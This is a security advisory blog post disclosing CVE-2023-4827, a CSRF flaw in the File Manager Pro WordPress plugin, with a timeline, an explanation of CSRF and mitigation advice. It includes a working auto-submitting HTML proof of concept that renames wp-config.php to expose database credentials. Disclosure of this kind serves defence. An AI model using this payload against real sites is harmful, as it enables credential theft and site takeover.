CVE-2023-4827 – File Manager Pro < 1.8 - Remote Code Execution via CSRF

During testing of the plugin, a CSRF vulnerability was discovered in action=rename, which can lead to denial of service and theft of the password from the database, thereby allowing an attacker to get inside the web application and gain a foothold in it. Replace any data in the database and do everything that an administrator can do. After logging into the database, he can create a new user and attach a hashed password to it. And through the administrator to implement RCE remote code execution

Main info:

CVE	CVE-2023-4827
Plugin	File Manager Pro
Critical	Very High
Publicly Published	September 12, 2023
Last Updated	September 12, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A2: Broken Authentication and Session Management
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4827 https://wpscan.com/vulnerability/d4daf0e1-8018-448a-964c-427a355e005f
Plugin Security Certification by CleanTalk

Timeline

August 25, 2023	Plugin testing and vulnerability detection in the File Manager Pro access plugin have been completed
August 25, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
September 8, 2023	The author has released a fix update
September 8, 2023	Registered CVE-2023-4827

Discovery of the Vulnerability

In the ever-evolving landscape of web security, the discovery of vulnerabilities is a critical aspect of keeping online systems safe. Recently, a noteworthy vulnerability, identified as CVE-2023-4827, was uncovered in File Manager Pro, specifically in versions prior to 1.8. This vulnerability poses a significant risk to web applications utilizing this plugin.

The vulnerability was first identified during a routine security assessment of the File Manager Pro plugin. It was categorized as a Cross-Site Request Forgery (CSRF) vulnerability, which, when exploited, could lead to remote code execution (RCE) on the affected web application.

Understanding of CSRF attack’s

Before delving into the specifics of this vulnerability, it’s crucial to understand what CSRF is and how it operates. CSRF, or Cross-Site Request Forgery, is a type of attack where an attacker tricks a user into executing actions on a web application without their consent. Essentially, it involves the exploitation of a user’s authenticated session to perform actions without their knowledge.

To illustrate this, imagine a scenario where an authenticated user is tricked into clicking a seemingly innocent link on a malicious website. This link sends a request to a target web application where the user is logged in, executing actions as if they initiated them themselves.

Exploiting the CSRF

In the case of CVE-2023-4827, the vulnerability was discovered in the “action=rename” feature of File Manager Pro. This vulnerability allows an attacker to craft a malicious CSRF request that forces an authenticated user to rename a file. While this may seem relatively benign at first glance, it has the potential for devastating consequences.

By exploiting this CSRF vulnerability, an attacker can initiate a series of actions leading to a remote code execution (RCE) scenario. They can gain control over the web application, potentially extracting sensitive information from the database, altering data, or even creating new users with hashed passwords. The attacker can effectively assume the privileges of an administrator and manipulate the application as they see fit.

POC html code:

<html> 

  <body> 

  <script>history.pushState(”, ”, ‘/’)</script> 

    <form action=”http://127.0.0.1/wordpress/wp-admin/admin-ajax.php”> 

      <input type=”hidden” name=”action” value=”fs&#95;connector” /> 

      <input type=”hidden” name=”cmd” value=”rename” /> 

      <input type=”hidden” name=”name” value=”wp&#45;config&#46;txt” /> 

      <input type=”hidden” name=”target” value=”l1&#95;d3AtY29uZmlnLnBocA” /> 

      <input type=”submit” value=”Submit request” /> 

    </form> 

    <script> 

      document.forms[0].submit(); 

    </script> 

  </body> 

</html>

Potential Risks and Real-World Impact

The potential risks associated with this vulnerability are significant. In a real-world scenario, an attacker could use CSRF to exploit File Manager Pro, gain access to a web application’s database, and compromise its security. They could then exfiltrate sensitive data, modify critical settings, or inject malicious code, potentially causing data breaches or service disruptions. Moreover, the attacker could establish persistent access, allowing them to maintain control over the application, leading to long-term security concerns.

Recommendations for Improved Security

To mitigate the risk associated with CVE-2023-4827 and similar CSRF vulnerabilities, several security measures should be considered:

1. Update and Patch: It is crucial to keep all software, including plugins and themes, up to date. Developers often release patches to address security vulnerabilities.
2. CSRF Protection: Implement robust CSRF protection mechanisms, such as anti-CSRF tokens, to ensure that requests are only executed when initiated by legitimate users.
3. Security Audits: Regular security audits and penetration testing can help identify and address vulnerabilities before they can be exploited.
4. Least Privilege Principle: Restrict user privileges to the minimum required for their tasks to limit potential damage in the event of a breach.
   
   

In conclusion, CVE-2023-4827 serves as a stark reminder of the importance of maintaining vigilance in the ever-evolving landscape of cybersecurity. By understanding CSRF and taking proactive steps to secure web applications, developers and administrators can minimize the risks associated with such vulnerabilities and protect their systems from potential exploitation.

#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #VeryHighVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website